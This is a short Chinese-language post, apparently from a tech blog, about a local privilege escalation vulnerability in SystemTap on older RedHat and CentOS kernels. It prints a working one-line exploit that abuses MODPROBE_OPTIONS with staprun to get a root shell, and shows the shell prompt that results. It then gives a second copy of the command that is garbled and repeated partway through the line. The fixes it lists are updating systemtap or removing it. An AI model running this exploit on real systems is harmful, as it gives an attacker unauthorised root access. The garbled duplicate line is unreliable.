linux系统
1,systemtap本地提权漏洞
利用代码:
[music@linuxso.com ~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
sh-3.2#
或者:
printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C
已测试受影响的版本:
RedHat
linux 2.6.18-194内核以下
RedHat(Centos) 已发布更新补丁
解决方案如下:
1.yum -y update systemtap
2.如果没有使用这个功能就卸载掉
本文介绍了一个在SystemTap中的本地提权漏洞及其利用方法。该漏洞主要影响RedHat及Centos系统,针对2.6.18-194内核版本及更早版本。文章提供了漏洞利用代码示例,并给出了具体的修复建议。

被折叠的 条评论
为什么被折叠?



